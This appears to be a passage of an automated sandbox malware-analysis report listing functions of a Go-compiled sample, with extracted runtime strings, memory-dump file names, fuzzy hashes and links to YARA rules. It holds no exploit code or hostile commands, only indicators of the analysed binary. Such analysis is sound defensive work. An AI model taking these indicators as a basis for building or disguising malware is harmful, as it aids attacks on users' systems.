                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AE5F2A
                                                                                • , xrefs: 00AE5E45
                                                                                • : ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCE, xrefs: 00AE5DFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCE$<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06
                                                                                • API String ID: 0-1984634995
                                                                                • Opcode ID: d2ae6f874813a7b4cec93520c1212da09dcafe1cb9067df4e08538fd55a1dbb1
                                                                                • Instruction ID: a566f1537fddff7f9ddaee4a19907554e95528f49cb27856747e0c02cdc5e222
                                                                                • Opcode Fuzzy Hash: d2ae6f874813a7b4cec93520c1212da09dcafe1cb9067df4e08538fd55a1dbb1
                                                                                • Instruction Fuzzy Hash: 7551B774909B859FC340EF76E29561EBBE0AF88348F80881DF4898B352D774D9489B63
                                                                                Function 00AF9C20 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing tr, xrefs: 00AF9D89
                                                                                • shrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensionsx509: malformed parameters is not assignable to type not in stack roots range, xrefs: 00AF9D5D
                                                                                • shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version1164153, xrefs: 00AF9D73
                                                                                • missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap : In of non-func typeregion exceeds uintptr range , xrefs: 00AF9D9F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: bad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid object identifiermissing stack in newstackmissing tr$missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap : In of non-func typeregion exceeds uintptr range $shrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensionsx509: malformed parameters is not assignable to type not in stack roots range$shrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version1164153
                                                                                • API String ID: 0-1834865256
                                                                                • Opcode ID: 12d22d7cee3f3e833ad0431dd4b6c8bb71538157fc731c6b8ee52e36febe1d38
                                                                                • Instruction ID: 4978cec1e54a3ebb43a85f2f6aaf45cdfaf45a3714601014703745b4c1399904
                                                                                • Opcode Fuzzy Hash: 12d22d7cee3f3e833ad0431dd4b6c8bb71538157fc731c6b8ee52e36febe1d38
                                                                                • Instruction Fuzzy Hash: 2D4189746043498FDB24EFA4C1D1BBA77E1BB88700F5448ACEA898B352E734DD45DB52
                                                                                Function 00AD84A0 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntryGetVersion, xrefs: 00AD85BC
                                                                                • ., xrefs: 00AD85F9
                                                                                • sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Name constraint %qx509: failed to unmarshal elliptic curve pointx509: malformed signature algorithm identifier (temporarily override with GODEBUG=x509sha1=1)Export directory contains man, xrefs: 00AD85F0
                                                                                • runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AD8592
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvokeDnsQuery_WECDSA-SHA1Exception GC forcedGOMAXPROCSGetIfEntryGetVersion$.$runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod$sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Name constraint %qx509: failed to unmarshal elliptic curve pointx509: malformed signature algorithm identifier (temporarily override with GODEBUG=x509sha1=1)Export directory contains man
                                                                                • API String ID: 0-2206806273
                                                                                • Opcode ID: 4f091bf92d119d97d0e928f77c182730e1ba5e91be69232978141b23d35d7866
                                                                                • Instruction ID: e9d5c31abcc1b5fbe76bfcc0666fb398e4a74677ba376c79ca91f97fe08ae4b9
                                                                                • Opcode Fuzzy Hash: 4f091bf92d119d97d0e928f77c182730e1ba5e91be69232978141b23d35d7866
                                                                                • Instruction Fuzzy Hash: 2131CDB59087498FCB10EF24D58136EB7E0BF88304F40896EE98697342DB74ED49CB92
                                                                                Function 00AE7420 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod, xrefs: 00AE752A
                                                                                • , goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM, xrefs: 00AE749C, 00AE754C
                                                                                • , g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standar, xrefs: 00AE7576
                                                                                • , gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f, xrefs: 00AE74C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standar$, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniM$, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregisterServerEgypt Standard TimeGC work not f$runtime: g: g=runtime: addr = runtime: base = runtime: gp: gp=runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod
                                                                                • API String ID: 0-1504408036
                                                                                • Opcode ID: 6ab0c7157c490388e8390ccfcaf401a17d370ddc7a223d192c1f2453f247e0b8
                                                                                • Instruction ID: bb50c0447d25b126bef124b2d6e6b114939f86b36b33e6adad86a1344627127c
                                                                                • Opcode Fuzzy Hash: 6ab0c7157c490388e8390ccfcaf401a17d370ddc7a223d192c1f2453f247e0b8
                                                                                • Instruction Fuzzy Hash: 0C4196B4908B85CFC304EF29E29565EBBE0BF88748F418C6DE48887352D774D948DB62
                                                                                Function 00AD0320 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r, xrefs: 00AD0459
                                                                                • min too largenil stackbaseout of memoryparsing time powrprof.dll, xrefs: 00AD040A
                                                                                • !, xrefs: 00AD0462
                                                                                • runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AD03D6, 00AD0425
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r$min too largenil stackbaseout of memoryparsing time powrprof.dll$runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory
                                                                                • API String ID: 0-3415125760
                                                                                • Opcode ID: 53bce4dba7a613f4acc2ec0dccd73c86ff0b978f69dcb3be32a55b0d09c4e6c3
                                                                                • Instruction ID: b9d64cb32e4ee6d50a1470dff2064e1344ff458b1b978597c0d27c4171a00fb8
                                                                                • Opcode Fuzzy Hash: 53bce4dba7a613f4acc2ec0dccd73c86ff0b978f69dcb3be32a55b0d09c4e6c3
                                                                                • Instruction Fuzzy Hash: 83316C74908786CFC710FF65C295B5EB7E0BF84708F40895EE8994B382E7749A099B63
                                                                                Function 00AEFF10 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMI, xrefs: 00AEFFCB
                                                                                • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateF, xrefs: 00AF0017
                                                                                • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads=, xrefs: 00AEFFA9
                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 00AF0061
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMI$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateF$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads=
                                                                                • API String ID: 0-2313186036
                                                                                • Opcode ID: 9b97a90321612821d8cbcff9815e3c9cf5eb3b9e09809481daa8869b4f9ca8d9
                                                                                • Instruction ID: a4ed417d9825909e1269f87cfc70f2de51b2e017975a543ada8fda5e1e654bac
                                                                                • Opcode Fuzzy Hash: 9b97a90321612821d8cbcff9815e3c9cf5eb3b9e09809481daa8869b4f9ca8d9
                                                                                • Instruction Fuzzy Hash: A031F4B4908B458FC300EF65D294B5EBBE0FF88308F45896DE8888B352D774D948DB62
                                                                                Function 00AD6470 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • +, xrefs: 00AD65AB
